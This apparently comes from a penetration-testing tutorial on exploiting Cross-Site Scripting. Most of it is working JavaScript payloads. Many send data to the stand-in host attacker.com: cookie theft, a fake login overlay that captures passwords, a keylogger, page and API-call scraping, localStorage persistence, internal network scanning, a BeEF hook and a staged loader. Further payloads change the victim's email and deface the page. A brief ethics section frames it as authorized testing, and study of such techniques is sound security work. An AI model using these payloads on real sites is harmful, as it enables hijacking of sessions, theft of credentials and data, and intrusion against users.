XSS Exploitation Strategies
Practical techniques for exploiting Cross-Site Scripting vulnerabilities in web applications
This guide covers practical exploitation strategies for Cross-Site Scripting (XSS) vulnerabilities. Understanding these techniques is essential for security professionals to demonstrate the real-world impact of XSS vulnerabilities during penetration testing.
Exploitation Fundamentals
Effective XSS exploitation requires:
- Payload delivery: Successfully injecting and executing JavaScript
- Impact demonstration: Showing meaningful security consequences
- Ethical considerations: Staying within the scope of authorized testing
Session Hijacking
One of the most common XSS exploitation goals is capturing user sessions.
Cookie Stealing
Basic cookie exfiltration payload:
new Image().src = "https://attacker.com/collect?cookie=" + encodeURIComponent(document.cookie);
Using Fetch API
Modern approach using Fetch:
fetch('https://attacker.com/collect', {
method: 'POST',
mode: 'no-cors',
body: document.cookie
});
Session Fixation
Force a victim to use a known session ID:
document.cookie = "sessionid" + "=" + "KNOWN_SESSION_ID; path=/";
Credential Harvesting
Fake Login Forms
Inject a convincing login overlay:
document.body.innerHTML = `
\\<div style={"position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:10000"}\\>
\\<form id={"fake"} style={"margin:100px auto;width:300px"}\\>
\\<h2\\>Session Expired\\</h2\\>
\\<p\\>Please log in again\\</p\\>
\\<input type="text" placeholder={"Username"} style={"width:100%;padding:10px;margin:10px 0"}\\>
\\<input type="password" placeholder={"Password"} id={"pass"} style={"width:100%;padding:10px;margin:10px 0"}\\>
\\<button type={"submit"} style={"width:100%;padding:10px"}\\>Login\\</button\\>
\\</form\\>
\\</div\\>`;
document.getElementById('fake').addEventListener('submit', function(e) {
e.preventDefault();
fetch('https://attacker.com/collect', {
method: 'POST',
mode: 'no-cors',
body: document.getElementById('pass').value
});
window.location = '/login';
});
Keylogging
Capture keystrokes on sensitive pages:
document.addEventListener('keypress', function(e) {
fetch('https://attacker.com/log', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify({key: e.key, page: location.href})
});
});
Data Exfiltration
DOM Scraping
Extract sensitive information from the page:
let data = {
url: location.href,
content: document.body.innerText,
fields: Array.from(document.querySelectorAll('input')).map(i => ({id: i.id, name: i.name, type: i.type, value: i.value}))
};
fetch('https://attacker.com/collect', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify(data)
});
API Hijacking
Intercept API calls to capture sensitive data:
let originalFetch = window.fetch;
window.fetch = function(url, options) {
fetch('https://attacker.com/log', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify({url, options})
});
return originalFetch.apply(this, arguments);
};
Client-Side Attacks
Cross-Site Request Forgery (CSRF)
Perform actions on behalf of the victim:
fetch('/api/change-email', {
method: 'POST',
credentials: 'include',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({email: 'attacker@evil.com'})
});
Virtual Defacement
Modify the appearance of the website:
document.body.style.background = 'black';
document.body.innerHTML = \'<h1 style="color:red;text-align:center">Site Hacked</h1>\';
Advanced Exploitation
Persistent Backdoors
Establish persistence using localStorage:
localStorage.setItem(\'backdoor\', \'(function(){fetch("https://attacker.com/beacon")})()\');
document.body.appendChild(document.createElement(\'script\')).text = \'eval(localStorage.getItem("backdoor"))\';
Network Scanning
Probe internal networks from the victim's browser:
function scanPort(host, port) {
return new Promise((resolve) => {
let img = new Image();
img.onload = () => resolve({host, port, status: 'open'});
img.onerror = () => resolve({host, port, status: 'closed'});
img.src = `http://${host}:${port}`;
setTimeout(() => resolve({host, port, status: 'timeout'}), 2000);
});
}
// Scan common ports on local network
let results = [];
for (let i = 1; i <= 10; i++) {
scanPort(`192.168.1.${i}`, 80).then(result => {
results.push(result);
if (results.length === 10) {
console.log(results);
fetch('https://attacker.com/scan-results', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify(results)
});
}
});
}
Browser Exploitation
Leverage XSS to attempt browser exploits:
// Fingerprint the browser
let fingerprint = {
userAgent: navigator.userAgent,
plugins: Array.from(navigator.plugins).map(p => p.name),
platform: navigator.platform,
language: navigator.language
};
// Send for targeted exploit delivery
fetch('https://attacker.com/fingerprint', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify(fingerprint)
});
Exploitation Frameworks
BeEF (Browser Exploitation Framework)
Hook a vulnerable page into the BeEF framework:
document.body.appendChild(document.createElement(\'script\')).src = \'https://attacker.com/hook.js\';
XSS Payload Delivery
Create a staged payload delivery system:
// Stage 1: Initial reconnaissance
fetch('https://attacker.com/stage1', {
method: 'POST',
mode: 'no-cors',
body: JSON.stringify({
url: location.href,
cookies: document.cookie,
localStorage: JSON.stringify(localStorage)
})
}).then(() => {
// Stage 2: Load the appropriate payload based on context
document.body.appendChild(document.createElement(\'script\')).src = \'https://attacker.com/stage2\';
});
Ethical Considerations
When demonstrating XSS exploits during authorized penetration testing:
- Stay within scope: Only target systems you're authorized to test
- Minimize impact: Avoid destructive actions or data exfiltration
- Document carefully: Record all actions for reporting
- Use safe endpoints: Direct callbacks to controlled servers
- Clean up: Remove any persistence mechanisms after testing
Next Steps
After exploring exploitation strategies, you may want to learn about:
- Evasion Techniques - Methods to bypass XSS filters
- Identification Techniques - Approaches to finding XSS vulnerabilities